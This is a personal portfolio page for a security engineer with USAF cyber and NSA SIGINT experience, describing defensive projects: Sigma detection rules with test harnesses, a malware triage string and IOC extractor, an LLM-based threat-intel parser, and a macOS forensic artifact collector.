Malware analysis, DFIR, threat intelligence, and detection engineering.
Four plus years of security engineering for the USAF, including building and running in-house software. Three years SIGINT analysis at NSA. Pivoting to security software engineering in 2026/2027.
Security software engineer with four plus years in USAF cyber operations and three years of SIGINT analysis at NSA. Active TS/SCI clearance with counterintelligence polygraph. GIAC-certified in reverse engineering (GREM), exploit research (GXPN), forensics (GCFA), and network forensics (GNFA).
I build detection pipelines, endpoint security software, and backend services that translate analyst workflows into systems that run. Python is my primary language; Go for services; Rust for systems programming that needs zero dependencies.
Pursuing a B.S. in Software Engineering at WGU, expected August 2026. Separating from the Air Force in 2027 and relocating to California for a pure software engineering role.
Detection-as-code repository covering Sigma rules organized by attacker TTP across endpoint logs, host syscalls, and Defender XDR. Python pytest harness with per-framework adapters generates tests from rule files; collection-time fixture validation makes it structurally impossible to ship a rule without its tests. GitHub Actions CI gates every commit. Per-rule decision docs capture threat model and false-positive profile.
Format-agnostic static analysis pipeline for malware triage. Extracts file hashes, printable strings, and IOC patterns — IPs, URLs, domains, file artifacts — via a two-pass modular extractor architecture. Outputs deterministic, deduplicated JSON for downstream automation.
Python CLI that converts unstructured threat-research text into deterministic structured threat intelligence via the Anthropic API. Pydantic schema serves as single source of truth — generates the tool's input_schema and validates the response, eliminating drift between API contract and parser. Forced tool-use on every call; malformed model output raises explicit ValidationError. Source provenance and extraction metadata included in the output envelope.
Modular macOS forensic artifact collector. Eight independent modules covering persistence mechanisms, process snapshots, code signing metadata, TCC permissions, extended attributes, credential artifacts, and Unified Log analysis. Zero third-party dependencies; read-only collection model.